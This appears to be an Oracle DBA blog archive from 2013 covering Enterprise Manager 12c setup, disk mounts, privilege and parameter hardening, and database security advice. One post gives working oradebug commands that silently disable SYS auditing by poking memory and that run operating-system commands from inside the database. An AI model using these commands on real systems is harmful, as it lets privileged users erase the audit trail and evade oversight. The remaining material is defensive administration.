Monday, April 29, 2013

Start/Stop Oracle Enterprise Manager 12c

To start Enterprise Manager 12c, follow the steps below:

export ORACLE_HOME=/u01/app/oracle/product/11.2.0/dbhome_1
export OMS_HOME=/u03/app/oracle/Middleware/om12c/oms/
export AGENT_HOME=/u03/app/oracle/Middleware/agent12c/agent_inst/

  • Ensure the database and listener are running.
  • Run the below command from $OMS_HOME:
emctl start oms

  • Run the below command from $AGENT_HOME
emctl start agent 

To stop all the services, do the following:

export ORACLE_HOME=/u01/app/oracle/product/11.2.0/dbhome_1
export OMS_HOME=/u03/app/oracle/Middleware/om12c/oms/
export AGENT_HOME=/u03/app/oracle/Middleware/agent12c/agent_inst/

  • Run the below command from $OMS_HOME
emctl stop oms -all

  • Run the below command from $AGENT_HOME
emctl stop agent 

  • Now you can shut down the database and listener.


Thank you
Osama mustafa

 



Step By Step to Install Enterprise Manager 12c on Redhat 6.1

In this article you will see how to install Oracle Enterprise Manager 12c (em12c) on the Redhat 6 update 1 operating system.

The first step is to select a supported OS and database for the repository. You can check the certification as follows:


1. Log in to My Oracle Support, which is accessible at the following URL: https://support.oracle.com
2. Click the Certifications tab.
3. In the Certification Search region, select Enterprise Manager Cloud Control from the Product list.
4. From the Release list, select 12.1.0.2.0, then click Search.
5. Expand the Databases node.


After checking the certification, you need to install the following:
  • Enterprise Manager 12c from here.
  • Redhat 6 from here.
  • If you install on Linux 64-bit, you need to apply Patch 10404530; download it from here.

Enterprise Manager has the following requirements:
Hardware

Minimum: 6 GB of RAM.
Disk space requirements: 30 GB to 50 GB for installation of the software.

Software

OMS Package

make-3.81
binutils-2.17.50.0.6
gcc-4.1.1
libaio-0.3.106
glibc-common-2.3.4
libstdc++-4.1.1
sysstat-5.0.5
glibc-2.5.12
glibc-devel-2.5-49

Agent Package

make-3.81
binutils-2.17.50.0.6
gcc-4.1.1
libstdc++-4.1.1

I will not mention the prerequisites, since in 11gR2 and 12c the installer reports what is missing in the OS and database configuration and fixes it during installation; if a missing package is found, the package name will appear and all you need to do is install it from the media (OS CD/DVD).

You also need to configure the database before you start installing em12c:
  • Remove DB Console from the database with the below command:
emca -deconfig dbcontrol db -repos drop

  • Change the below database parameters :

ALTER SYSTEM SET processes=300 SCOPE=SPFILE;
ALTER SYSTEM SET session_cached_cursors=200 SCOPE=SPFILE;
ALTER SYSTEM SET sga_target=2G SCOPE=SPFILE;
ALTER SYSTEM SET shared_pool_size=600M SCOPE=SPFILE;
ALTER SYSTEM SET pga_aggregate_target=1G SCOPE=SPFILE;
ALTER SYSTEM SET job_queue_processes=20 SCOPE=SPFILE;
ALTER SYSTEM SET open_cursors=300 SCOPE=SPFILE;

  • Restart the database.
  • Create new folders to install em12c:
mkdir -p /u02/app/oracle/middleware/
cd /u02/app/oracle/middleware
mkdir om12c
mkdir agent12c 

  • By now you should have finished the download; unzip it and start the installation (./runInstaller).
I will provide you with screenshots of the installation:

Asking for MOS account

Asking for Updates 


 Check prerequisites

Sometimes you will receive a warning related to a glibc error; press Yes:

Now you need to choose the installation type
Choose the location where you want to install
Middleware location : /u02/app/oracle/middleware/oms12c
Agent Location : /u02/app/oracle/middleware/agent12c


On the next screen you need to choose a password and create the connection to the database


On the first warning dialog, click the "Yes" button to disable the stats gathering job.


review :

During the installation :




Done

You can also download this article from here.

Thank you
Osama mustafa


Sunday, April 28, 2013

Add New Mount On Linux ( Redhat 6)

Sometimes you need to add a new mount to Linux after the system has been created. The following article describes how to do this; all the steps were tested on Redhat 6.1. After adding the disk:


[root@localhost Desktop]# fdisk -l
Disk /dev/sda: 85.9 GB, 85899345920 bytes
255 heads, 63 sectors/track, 10443 cylinders
Units = cylinders of 16065 * 512 = 8225280 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disk identifier: 0x000be2c2
   Device Boot      Start         End      Blocks   Id  System
/dev/sda1   *           1         262     2097152   83  Linux
Partition 1 does not end on cylinder boundary.
/dev/sda2             262        2220    15728640   83  Linux
/dev/sda3            2220        3525    10485760   83  Linux
/dev/sda4            3525        7833    34601984    5  Extended
/dev/sda5            3525        4831    10485760   83  Linux
/dev/sda6            4831        5484     5242880   82  Linux swap / Solaris
/dev/sda7            5484        5745     2097152   8e  Linux LVM
/dev/sda8            5745        7833    16772096   83  Linux
Disk /dev/sdb: 26.8 GB, 26843545600 bytes
255 heads, 63 sectors/track, 3263 cylinders
Units = cylinders of 16065 * 512 = 8225280 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disk identifier: 0x00000000
As you can see in the red line, I added a disk with a size of 26G.

I need to prepare this disk:

[root@localhost Desktop]# fdisk /dev/sdb

Device contains neither a valid DOS partition table, nor Sun, SGI or OSF disklabel
Building a new DOS disklabel with disk identifier 0xe88f8de7.
Changes will remain in memory only, until you decide to write them.
After that, of course, the previous content won't be recoverable.
Warning: invalid flag 0x0000 of partition table 4 will be corrected by w(rite)
WARNING: DOS-compatible mode is deprecated. It's strongly recommended to
         switch off the mode (command 'c') and change display units to
         sectors (command 'u').
Command (m for help): n
Command action
   e   extended
   p   primary partition (1-4)
p
Partition number (1-4): 1
First cylinder (1-3263, default 1):
Using default value 1
Last cylinder, +cylinders or +size{K,M,G} (1-3263, default 3263):
Using default value 3263
Command (m for help): w
The partition table has been altered!
Calling ioctl() to re-read partition table.
Syncing disks.
After creating the disk, I need to format it; I chose ext3:

[root@localhost Desktop]# mkfs -t ext3 /dev/sdb1
mke2fs 1.41.12 (17-May-2010)
Filesystem label=
OS type: Linux
Block size=4096 (log=2)
Fragment size=4096 (log=2)
Stride=0 blocks, Stripe width=0 blocks
1638400 inodes, 6552504 blocks
327625 blocks (5.00%) reserved for the super user
First data block=0
Maximum filesystem blocks=0
200 block groups
32768 blocks per group, 32768 fragments per group
8192 inodes per group
Superblock backups stored on blocks:
32768, 98304, 163840, 229376, 294912, 819200, 884736, 1605632, 2654208,
4096000
Writing inode tables: done                          
Creating journal (32768 blocks): done
Writing superblocks and filesystem accounting information: done
This filesystem will be automatically checked every 28 mounts or
180 days, whichever comes first.  Use tune2fs -c or -i to override.

Link the disk with a new folder:

[root@localhost Desktop]# mkdir /u03
[root@localhost Desktop]# mount -t ext3 /dev/sdb1 /u03
[root@localhost Desktop]# df -h
/dev/sdb1              25G  173M   24G   1% /u03

Don't forget to add it to /etc/fstab.

Thank you 
Osama mustafa

Friday, April 26, 2013

ORA-00838: Specified value of MEMORY_TARGET is too small,

SQL> startup
ORA-00838: Specified value of MEMORY_TARGET is too small, needs to be at least 3072M

Do the calculation: 3072*1024*1024 = 3221225472

SQL> create pfile='/u02/backup.init' from spfile;

Edit the file and put the above number in memory_target.

SQL> create spfile from pfile='/u02/backup.init' ;

SQL> startup ;


Thank you
Osama mustafa

Thursday, April 25, 2013

SQL92_SECURITY Parameter

SQL> show parameter sql92_

NAME                                 TYPE        VALUE
------------------------------------ ----------- ------------------------------
sql92_security                       boolean     FALSE
SQL92_SECURITY looks like a parameter related to security, but what is it? What are the benefits of using this parameter?

I will describe it with this example, since that will make it understandable :)

SQL> create user test1 identified by test1 ;

User created.

SQL> grant create session , Create table to test1 ;

Grant succeeded.

SQL>
SQL>
SQL> create user test2 identified by test2 ;

User created.

SQL> grant create session to test2 ;

Grant succeeded.

SQL> create user test3 identified by test3 ;

User created.

SQL> grant create session to test3 ;

Grant succeeded.
SQL> conn test1/test1 ;
Connected.
SQL> create table new ( id number(20)) ;

Table created.

SQL> BEGIN
    FOR v_LoopCounter IN 1..50 LOOP
    INSERT INTO new (id)
    VALUES (v_LoopCounter);
     END LOOP;
         END;
   / 

PL/SQL procedure successfully completed.
SQL> conn test1/test1 ;
Connected.
SQL>
SQL>
SQL>
SQL> grant update on test1.new to test2 ;

Grant succeeded.
 
SQL> grant update on test1.new to test3;

Grant succeeded.

SQL> grant select on test1.new to test3;

SQL> conn test2/test2 ;
Connected.
SQL> update test1.new set id=1 where id=10 ;

1 row updated.

SQL> conn test3/test3 ;
Connected.
SQL> update test1.new set id=10 where id=1 ;

2 rows updated.
Now let's set SQL92_SECURITY to TRUE, restart the database, and run the same statement again as each user.

SQL> conn test2/test2
SQL> update test1.new set id=1 where id=10 ;
ERROR at line 1:
ORA-01031: insufficient privileges
SQL> conn test3/test3;
Connected.
SQL> update test1.new set id=10 where id=1 ;

2 rows updated.
What is happening here? Each of the users has privileges on test1.new, so why does test2 stop working after SQL92_SECURITY is set to TRUE?

Simply put, SQL92_SECURITY requires both the UPDATE/DELETE and the SELECT privilege for the same user; if the user is granted only one of these privileges, it will be useless.

Amazing :)
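
The check below is an added example, not part of the original post: before switching SQL92_SECURITY to TRUE, it lists users who hold UPDATE or DELETE on a table but no SELECT on it (directly, through PUBLIC, or through nested roles), which is the situation test2 is in above. It assumes access to the DBA_ views and 11gR2 or later for LISTAGG; column-level grants in dba_col_privs and roles granted to PUBLIC are not evaluated.

```sql
-- Added example: grants that start failing with ORA-01031 once
-- SQL92_SECURITY = TRUE (UPDATE/DELETE held without SELECT on the same object).
WITH grant_source AS (
  -- a user holds what is granted to the user itself ...
  SELECT username AS principal, username AS via
  FROM   dba_users
  UNION ALL
  -- ... what is granted to PUBLIC ...
  SELECT username, 'PUBLIC'
  FROM   dba_users
  UNION ALL
  -- ... and what is granted to any role reachable through nested role grants
  SELECT CONNECT_BY_ROOT grantee, granted_role
  FROM   dba_role_privs
  START WITH grantee IN (SELECT username FROM dba_users)
  CONNECT BY PRIOR granted_role = grantee
),
held AS (
  -- effective SELECT/UPDATE/DELETE object privileges per user
  SELECT DISTINCT gs.principal, tp.owner, tp.table_name, tp.privilege
  FROM   grant_source gs
  JOIN   dba_tab_privs tp ON tp.grantee = gs.via
  WHERE  tp.privilege IN ('SELECT', 'UPDATE', 'DELETE')
)
SELECT h.principal,
       h.owner,
       h.table_name,
       LISTAGG(h.privilege, ', ') WITHIN GROUP (ORDER BY h.privilege)
         AS dml_without_select
FROM   held h
WHERE  h.privilege IN ('UPDATE', 'DELETE')
AND    h.principal <> h.owner              -- owners can always read their own tables
AND    NOT EXISTS (                        -- no SELECT on the same object
         SELECT 1
         FROM   held s
         WHERE  s.principal  = h.principal
         AND    s.owner      = h.owner
         AND    s.table_name = h.table_name
         AND    s.privilege  = 'SELECT')
AND    NOT EXISTS (                        -- and no blanket SELECT ANY TABLE
         SELECT 1
         FROM   grant_source gs
         JOIN   dba_sys_privs sp ON sp.grantee = gs.via
         WHERE  gs.principal = h.principal
         AND    sp.privilege = 'SELECT ANY TABLE')
GROUP  BY h.principal, h.owner, h.table_name
ORDER  BY h.principal, h.owner, h.table_name;

-- For the demo above the query returns TEST2 / TEST1 / NEW / UPDATE.
-- The fix is to decide whether the account really needs the DML privilege,
-- and if it does, to grant the matching read privilege:
--   GRANT SELECT ON test1.new TO test2;
```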


Thank you
Osama Mustafa

Tuesday, April 23, 2013

Short Look for Oracle Privileges

Oracle Database contains two types of privileges, System and Object, and each is granted to users as they need it. There is also an interesting entity called PUBLIC. It is more a role than a user: every user created in the database is assigned to PUBLIC by default, and unfortunately nothing can be done to change that. You can think of it as a user group, so if you grant any privilege (System or Object) to PUBLIC, every database user will have that privilege. You need to be careful about what you do when dealing with PUBLIC.

PUBLIC is everyone with access to the database. PUBLIC is an entity that can be granted any privilege and assigned any role. All database users automatically inherit all the rights assigned to PUBLIC. It's a simple concept designed for convenience. Granting permissions to PUBLIC is easy to do, and often the easiest way to get a system working; however, the security implications of using the PUBLIC group to assign permissions are significant. PUBLIC should be treated with care and used sparingly.

Before going deeper into this subject we need to understand roles and privileges in Oracle Database. As you all know, Oracle privileges control the rights to see, modify, create or alter objects in the database, depending on the privileges you have. As I mentioned earlier, two kinds of privileges exist in the database: System and Object.

System privileges are not related to any specific object or schema. Object privileges are just the opposite: they are directly related to a specific object or schema. Check the examples below:

System Privilege          Object Privilege
------------------------  ----------------
GRANT ANY PRIVILEGE       GRANT
ALTER ANY ROLE            ALTER
ALTER DATABASE            SELECT


To check system privileges in the database, query the following DBA_ dictionary view:

SQL> desc dba_sys_privs;
 Name                                      Null?    Type
 ----------------------------------------- -------- ----------------------------
 GRANTEE                                   NOT NULL VARCHAR2(30)
 PRIVILEGE                                 NOT NULL VARCHAR2(40)
 ADMIN_OPTION                                       VARCHAR2(3)

Sample data from the table:

GRANTEE                        PRIVILEGE                                ADM
------------------------------ ---------------------------------------- ---
SYS                            CREATE OPERATOR                          NO
SYS                            EXECUTE ANY OPERATOR                     NO
SYS                            CREATE DIMENSION                         NO
SYS                            ADMINISTER RESOURCE MANAGER              NO

As another example, I want to check SCOTT and his system privileges:


SQL> select * from dba_sys_privs where GRANTEE = 'SCOTT';
GRANTEE                        PRIVILEGE                                ADM
------------------------------ ---------------------------------------- ---
SCOTT                          UNLIMITED TABLESPACE                     NO
Now let's talk about object privileges:

SQL> desc dba_tab_privs;
 Name                                      Null?    Type
 ----------------------------------------- -------- ----------------------------
 GRANTEE                                   NOT NULL VARCHAR2(30)
 OWNER                                     NOT NULL VARCHAR2(30)
 TABLE_NAME                                NOT NULL VARCHAR2(30)
 GRANTOR                                   NOT NULL VARCHAR2(30)
 PRIVILEGE                                 NOT NULL VARCHAR2(40)
 GRANTABLE                                          VARCHAR2(3)
 HIERARCHY                                          VARCHAR2(3)

More complex, huh? Read the Oracle documentation here.

SQL> select OWNER, TABLE_NAME, PRIVILEGE, GRANTABLE from dba_tab_privs where GRANTEE = 'SCOTT';
no rows selected.
What about roles? As we know, Oracle comes with predefined roles such as DBA, RESOURCE and CONNECT; you can also create your own role, which is a set of privileges used to manage users' privileges.
A user can be a member of more than one role, and roles can even be members of other roles.
Users in a company leave their jobs, travel, or simply no longer need privileges in the future; creating Oracle roles makes all of this easy to manage. Privileges are then granted only to the roles, never to a specific user; if the privileges ever change, they are changed on the role and automatically take effect for all users with the role. You can check the roles with:


SQL> desc dba_roles ;
 Name                                      Null?    Type
 ----------------------------------------- -------- ----------------------------
 ROLE                                      NOT NULL VARCHAR2(30)
 PASSWORD_REQUIRED                                  VARCHAR2(8)

For information about this table you can read the Oracle documentation here.

SQL> desc dba_role_privs
 Name                                      Null?    Type
 ----------------------------------------- -------- ----------------------------
 GRANTEE                                            VARCHAR2(30)
 GRANTED_ROLE                              NOT NULL VARCHAR2(30)
 ADMIN_OPTION                                       VARCHAR2(3)
 DEFAULT_ROLE                                       VARCHAR2(3)

The above table checks the privileges granted to roles; you can refer to the Oracle documentation here.
Check the below query to determine which users have the DBA role:

SQL> select GRANTEE, ADMIN_OPTION, DEFAULT_ROLE from dba_role_privs where
  2  GRANTED_ROLE = 'DBA';

GRANTEE                        ADM DEF
------------------------------ --- ---
SYS                            YES YES
SYSMAN                         NO  YES
SYSTEM                         YES YES
In conclusion, PUBLIC can be granted any of the roles. While it is easy and fully supported to grant roles to PUBLIC, I don't recommend doing that. Can you give one case where you would need to?

Check the roles granted to PUBLIC:

SQL> select * from dba_role_privs where GRANTEE = 'PUBLIC';
no rows selected

And this is exactly what we want: no roles granted to PUBLIC.
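
The direct-grant query for the DBA role shown earlier misses users who receive DBA through another role, since roles can be members of other roles. The following queries are an added example, not from the original post: the first walks nested role grants to list every user who effectively holds DBA, and the second lists everything granted to PUBLIC in one result set. The excluded owner list in the second query is an assumption to adjust for your installation.

```sql
-- Added example 1: users holding DBA directly or through nested roles,
-- with the chain of roles that leads there.
SELECT username,
       username || role_path AS grant_path
FROM  (
        SELECT CONNECT_BY_ROOT grantee                   AS username,
               granted_role,
               SYS_CONNECT_BY_PATH(granted_role, ' -> ') AS role_path
        FROM   dba_role_privs
        START WITH grantee IN (SELECT username FROM dba_users)
        CONNECT BY PRIOR granted_role = grantee
      )
WHERE  granted_role = 'DBA'
ORDER  BY username, grant_path;

-- Added example 2: everything every database user inherits through PUBLIC.
SELECT 'SYSTEM PRIVILEGE'          AS grant_type,
       privilege                   AS granted,
       CAST(NULL AS VARCHAR2(61))  AS on_object
FROM   dba_sys_privs
WHERE  grantee = 'PUBLIC'
UNION ALL
SELECT 'ROLE',
       granted_role,
       CAST(NULL AS VARCHAR2(61))
FROM   dba_role_privs
WHERE  grantee = 'PUBLIC'
UNION ALL
SELECT 'OBJECT PRIVILEGE',
       privilege,
       owner || '.' || table_name
FROM   dba_tab_privs
WHERE  grantee = 'PUBLIC'
-- Assumption: these owners are Oracle-supplied schemas whose PUBLIC grants
-- ship with the product; remove entries to review them as well.
AND    owner NOT IN ('SYS', 'SYSTEM', 'XDB', 'MDSYS', 'CTXSYS',
                     'OLAPSYS', 'WMSYS', 'EXFSYS', 'ORDSYS')
ORDER  BY grant_type, granted, on_object;
```

Any row of type SYSTEM PRIVILEGE or ROLE in the second result, and any object privilege on an application schema, is held by every account that can log in.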

Thank you 
Osama Mustafa

Monday, April 22, 2013

what is oracle inventory


While installing Oracle software, a new directory called oraInventory is created in ORACLE_BASE. What is it? What are the benefits of this folder? What kind of information is stored in it?

The inventory is created when you install the database and is used for upgrades and patches. There are two kinds of Oracle inventory: a central inventory per server, and a local inventory for each ORACLE_HOME. The difference between them is that the central inventory basically contains a high-level list of the components installed on the server. It is updated each time components are installed or uninstalled, but it does not have detailed information such as the patch level of each ORACLE_HOME. The local inventory, on the other hand, contains component information together with patch-level information.

Another difference is that the Central Inventory contains the information related to all Oracle products installed on a host, and consists of a file called inventory.xml, which lists all the Oracle Homes installed on the node.
The Local Inventory ($ORACLE_HOME/inventory) contains the details of the patch level for that ORACLE_HOME. The Local Inventory gets updated whenever a patch is applied to the ORACLE_HOME using OUI. If the Local Inventory becomes corrupt or is lost, it is very difficult to recover, and this may result in having to reinstall the ORACLE_HOME and re-apply all patchsets and patches.

For more information about this topic refer to MOS:
Global and Local Inventory explained [ID 360079.1]
FAQs on Central Inventory and Oracle Home Inventory (Local Inventory) in Oracle RDBMS [ID 564192.1]

Thank you 
Osama mustafa

Saturday, April 20, 2013

Disable Auditing Using Oradebug

In 2011 Laszlo Toth showed some Oracle tricks to disable auditing in Oracle Database, including SYS auditing, using a simple command called oradebug. Note that oradebug is undocumented in all Oracle versions, and if you have SYSDBA privileges you can do a lot of things with this command.

Below is the demonstration:


sqlplus / as sysdba

SQL> -- get the offset for oradebug

SQL> select fsv.KSMFSNAM,sga.*
from x$ksmfsv fsv, x$ksmmem sga
where sga.addr=fsv.KSMFSADR
and fsv.ksmfsnam like 'kzaflg_%';

KSMFSNAM ADDR             INDX  INST_ID KSMMMVAL
-------- ---------------- ----- ------- ----------------
kzaflg_  0000000060031BB0 26652 1       0000000000000001

SQL> show parameter audit;

NAME                                 TYPE        VALUE
------------------------------------ ----------- ------------------------------
audit_file_dest                      string      /u01/app/oracle/admin/PSALES/adump
audit_sys_operations                 boolean     TRUE
audit_syslog_level                   string
audit_trail                          string      DB, EXTENDED

SQL> oradebug poke 0x60031bb0 1 0
BEFORE: [060031BB0, 060031BB4) = 00000001
AFTER: [060031BB0, 060031BB4) = 00000000

Note that with oradebug your Audit Vault becomes useless. Another trick: we can use oradebug to call OS commands from the database :)

SQL> oradebug call system "ls -la >/tmp/hacktivity.txt"

Thank you
Osama mustafa

Wednesday, April 17, 2013

Oracle Critical Patch Updates for April 2013


The Critical Patch Update for April 2013 and The Oracle Java SE Critical Patch Update for April 2013 were released on April 16th, 2013. Oracle strongly recommends applying the patches as soon as possible. Please note that Sun products are included in this Critical Patch Update.

You can download them for free from the links below:

Oracle Technology Network: press here
Oracle Technology Network page to download the CPU patch: here
Oracle Java SE patch: press here




Thank you
Osama mustafa

Oracle Security --> Where to Start ? What to do ?

When you read the title you may start thinking of a race, and you may well think that since technology is moving fast. But this article is not about a race; it is about where I should look when I secure my database, and what I should secure. I have posted other articles about security, how to secure your database and the benefits of securing it. Here I will try to mention the most important points for securing and protecting the database, especially from internal users.

A database is complex, so the DBA (database administrator) must understand potential security impacts and the three-component triangle which I mentioned before in "Top ten Threats to Database". For example, when DBAs look only at availability they ignore correct configuration, which causes security vulnerabilities, and this can lead to exposure of confidential data. It's not only about the database: if you have an application, you need to take it over and start securing it as well. But what can I do? Where to start, and how?

The basic step to start with, as I mentioned in my post "basic Steps to Secure Oracle", is to discuss the risk management that leads to this. You can then secure your database by looking at the following key areas:

  • Auditing
  • Database Configuration
  • Access to database
  • Authentication 

I need to remind you of something: security does not mean I will protect my database 100%; it is a way to prevent attacks and make them harder. But what if the attackers get into the database?

Auditing 


Auditing allows us to monitor database users, or anything that happens on the database. First, the audit_sys_operations parameter should be set to TRUE to monitor SYS user operations. The audit_trail parameter (DB|OS) determines where the audit records go: for example, they can be written to the database, or to the file system if you set this parameter to OS. Let's talk about the database here:


SQL> SELECT * FROM dba_obj_audit_opts;
SQL> SELECT * FROM dba_priv_audit_opts;
SQL> SELECT * FROM dba_stmt_audit_opts;
You cannot enable auditing to monitor all database activities, but at least you can enable it for actions such as create session, by running this command: audit create session;

What I love in the 11gR2 documentation is that Oracle has created its own list of recommended audit settings, which means you should enable them. Another type of auditing, called FGA, allows you to create a policy that runs on a certain event; for example, when scott reads the Sal column from table emp, I want to record this transaction in a table. Read more about DBMS_FGA.ADD_POLICY; to check these events you need access to sys.fga$.

After you enable auditing, it's very important to create your own reports to monitor the database. Oracle offers a product to centralize these audit logs, called Audit Vault; a benefit of this product is that it automatically cleans up the old data (only once it has been transferred to the server) and removes it.

Database Configuration

When I start talking about secure configuration, a lot of steps come to mind, but I will try to keep it simple since I can't cover everything in this topic; I will divide it into more than one topic and post them on my blog. In this part you have to look at the network, listener, client side, parameters, and backup (I apologize if I forgot something). Each of these components is very important, but let's talk about parameters. As we all know, the database has a parameter file called the spfile/pfile. Some parameters are set to TRUE by default when I don't need them, and vice versa. Changing the values of these parameters is important to avoid weaknesses in the future. Some of these parameters are:

  • os_roles ---> should be FALSE
  • os_authent_prefix ---> Ops$
  • o7_dictionary_accessibility ---> should be FALSE
  • audit_sys_operations ---> should be TRUE
  • global_names ---> should be TRUE
  • remote_listener ---> use it only if you need it
  • remote_login_passwordfile ---> none
  • sec_case_sensitive_logon ---> should be TRUE
  • sql92_security ---> should be TRUE
  • remote_os_roles ---> should be FALSE
There are a lot of parameters, but I have mentioned only some of them.
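
One way to check an instance against the list above, as an added example that is not part of the original post: the first query compares the running values in v$parameter with the values the list recommends and says whether a change needs a restart; the second prints the entries that need a judgement call rather than a fixed value. It assumes SELECT access to v$parameter; a parameter that does not exist in your version is reported as such.

```sql
-- Added example: compare current settings with the recommended values above.
WITH expected AS (
  SELECT 'os_roles' AS name, 'FALSE' AS want FROM dual UNION ALL
  SELECT 'o7_dictionary_accessibility', 'FALSE' FROM dual UNION ALL
  SELECT 'audit_sys_operations',        'TRUE'  FROM dual UNION ALL
  SELECT 'global_names',                'TRUE'  FROM dual UNION ALL
  SELECT 'remote_login_passwordfile',   'NONE'  FROM dual UNION ALL
  SELECT 'sec_case_sensitive_logon',    'TRUE'  FROM dual UNION ALL
  SELECT 'sql92_security',              'TRUE'  FROM dual UNION ALL
  SELECT 'remote_os_roles',             'FALSE' FROM dual
)
SELECT e.name,
       p.value AS current_value,
       e.want  AS recommended,
       CASE
         WHEN p.name IS NULL          THEN 'NOT PRESENT IN THIS VERSION'
         WHEN UPPER(p.value) = e.want THEN 'OK'
         ELSE 'REVIEW'
       END AS status,
       -- ISSYS_MODIFIABLE = FALSE means ALTER SYSTEM ... SCOPE=SPFILE plus restart
       CASE p.issys_modifiable
         WHEN 'FALSE'     THEN 'SCOPE=SPFILE, restart required'
         WHEN 'DEFERRED'  THEN 'applies to new sessions'
         WHEN 'IMMEDIATE' THEN 'dynamic'
       END AS how_to_change
FROM   expected e
LEFT   JOIN v$parameter p ON p.name = e.name
ORDER  BY status DESC, e.name;

-- Entries from the list with no single correct value: review by hand.
--   remote_listener   : should be empty unless you really need it
--   os_authent_prefix : prefix used for OS-authenticated accounts
--   audit_trail       : where audit records are written (DB or OS)
SELECT name, value, isdefault
FROM   v$parameter
WHERE  name IN ('remote_listener', 'os_authent_prefix', 'audit_trail')
ORDER  BY name;
```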

Also, don't forget to secure your listener: set a password for the listener and change the default port. These are simple steps, but they help you avoid future attacks.
Another point: don't forget to patch your database. Check the Oracle site for new CPU and PSU patches; this will fix security vulnerabilities. Read more here.
Another way to secure the configuration is to use a database firewall (I will post a topic about it later), a network firewall, and to create policy inside the company.

Access to database


In each topic I post I talk about this, and I will mention it in every topic in the future. It's important, and most hacking cases happen because a user has more privileges than he needs. Why? Is your data not important? When a user is authenticated to the database, the first thing you need to check is what this user is allowed to do, especially for developers and application users (does he need the DBA role to execute a procedure?).

SQL> SELECT * FROM dba_sys_privs;
SQL> SELECT * FROM dba_role_privs;
SQL> SELECT * FROM dba_col_privs;
SQL> SELECT * FROM dba_tab_privs;

It's not only about privileges. Creating development, test and QA databases is important, since not everything that works on production is correct. Create new users with different privileges, some of them to monitor and some of them to manage; boring but useful. Don't forget database links: I mentioned before, in my topics about database link security, how these can affect your database. Links create new privilege escalation paths. Review database links and check who has access to them, who uses them, how they use them, and whether they are still valid.

SQL> SELECT * FROM sys.link$;

In conclusion, you have to check user privileges, application users, users and database links, and create new instances for new jobs. Not every company spends money to secure its database, but why should I buy new products when I am not doing the basic steps first? It may save the company a small fortune, and they will love you for that.

Authentications

Well, I should have mentioned it first, but it's all about security, so why should I care? The first thing that happens in the database is authentication: obtaining the user's information and password. The problem is that the multiple ways of doing that make the risk high; you have OS authentication, etc. Check my post about "Effect of Default Password" and you will be surprised by what I can do with a default password! In 11g you can check for default passwords in a new view:


SQL> select * from dba_users_with_defpwd;
But you also can't forget about:
SQL> select * from dba_users;

Each of them has a different job; not everything is mentioned in dba_users_with_defpwd. Once you change the password and create a new one (hard to guess), you need to provide new rules for passwords. Here we start talking about profiles:

SQL> select * from dba_profiles ;
Example of how to create a profile in Oracle:

CREATE PROFILE Example LIMIT
  FAILED_LOGIN_ATTEMPTS 3 
  PASSWORD_LOCK_TIME 5    
  PASSWORD_LIFE_TIME 30   
  PASSWORD_GRACE_TIME 3   
  PASSWORD_REUSE_TIME 120 
  PASSWORD_REUSE_MAX 10   
/
Also read the Oracle documentation here.

I will talk later about authentication types in Oracle, with examples, and about which one is more secure and when I need to use it.

Don't forget that Oracle provides password complexity checking in a script called utlpwdmg.sql, located in $ORACLE_HOME/rdbms/admin; just run it as / as sysdba and the new rules will be applied to passwords. You can also create your own. This script enforces the following:
  • The password contains eight characters or more.
  • The password is not the same as the username.
  • The password should not be simple.
  • The password should contain numeric and alphabetic characters.
  • The password should be different from the last password.
and other features. Simple and amazing, right? :)
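
The three views named in this section (dba_users_with_defpwd, dba_users and dba_profiles) are most useful when read together. The query below is an added example, not from the original post: for every account it shows whether the password is still a default, the account status, and the password limits that actually apply, resolving a limit of DEFAULT to the value in the DEFAULT profile. It assumes 11g or later for dba_users_with_defpwd.

```sql
-- Added example: one row per account with default-password flag and the
-- effective password limits of its profile.
SELECT u.username,
       u.account_status,
       u.profile,
       NVL2(d.username, 'YES', 'NO') AS default_password,
       MAX(DECODE(p.resource_name, 'FAILED_LOGIN_ATTEMPTS',
           DECODE(p.limit, 'DEFAULT', dp.limit, p.limit))) AS failed_login_attempts,
       MAX(DECODE(p.resource_name, 'PASSWORD_LOCK_TIME',
           DECODE(p.limit, 'DEFAULT', dp.limit, p.limit))) AS password_lock_time,
       MAX(DECODE(p.resource_name, 'PASSWORD_LIFE_TIME',
           DECODE(p.limit, 'DEFAULT', dp.limit, p.limit))) AS password_life_time,
       MAX(DECODE(p.resource_name, 'PASSWORD_REUSE_MAX',
           DECODE(p.limit, 'DEFAULT', dp.limit, p.limit))) AS password_reuse_max,
       -- NULL here means no complexity function (e.g. from utlpwdmg.sql) is set
       MAX(DECODE(p.resource_name, 'PASSWORD_VERIFY_FUNCTION',
           DECODE(p.limit, 'DEFAULT', dp.limit, p.limit))) AS verify_function
FROM   dba_users u
LEFT   JOIN dba_users_with_defpwd d
       ON  d.username = u.username
LEFT   JOIN dba_profiles p
       ON  p.profile = u.profile
       AND p.resource_type = 'PASSWORD'
LEFT   JOIN dba_profiles dp                 -- fallback values from DEFAULT
       ON  dp.profile = 'DEFAULT'
       AND dp.resource_name = p.resource_name
GROUP  BY u.username, u.account_status, u.profile, d.username
ORDER  BY default_password DESC, u.account_status, u.username;

-- Rows to act on first: default_password = 'YES' with account_status = 'OPEN',
-- then accounts whose limits show UNLIMITED or whose verify_function is NULL.
-- Assigning the profile created above to an account (placeholder user name):
--   ALTER USER <username> PROFILE Example;
```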

In conclusion, I will post more topics about security with more examples. I hope this is useful and simple; I can't cover everything in one article, as it would be huge, but I will try to do my best.

Thank you
Osama Mustafa

Tuesday, April 16, 2013

ORA-1461 encountered when generating server alert SMG-3500

Two bugs could be related to this error: Bug 6085625 and unpublished bug 6452485.

To fix them you need to apply Patch 6602742 or Patch 6602482, depending on your case.


As a workaround you have two options:

A. Flushing the shared pool can help remove the problem cursor from the shared pool.
B. Or set SESSION_CACHED_CURSORS = 0


Thank you
Osama mustafa

Monday, April 15, 2013

Oracle APPS DBA vs Oracle DBA

The names differ in one thing, "Apps". Both are DBAs in the same corporation, but before going further you need to know the definition of each: what does APPS DBA mean, and what does Oracle DBA mean?

A DBA (database administrator) is the person responsible for administering, monitoring, tuning and recovering the database (in failure cases). For Oracle Database this person is called an Oracle DBA.

This person has a lot of jobs and tasks:



  • Installing and upgrading the Oracle server and application tools
  • Allocating system storage and planning future storage requirements for the database system
  • Creating primary database storage structures (tablespaces) after application developers have designed an application
  • Creating primary objects (tables, views, indexes) once application developers have designed an application
  • Modifying the database structure, as necessary, from information given by application developers
  • Enrolling users and maintaining system security
  • Ensuring compliance with your Oracle license agreement
  • Controlling and monitoring user access to the database
  • Monitoring and optimizing the performance of the database
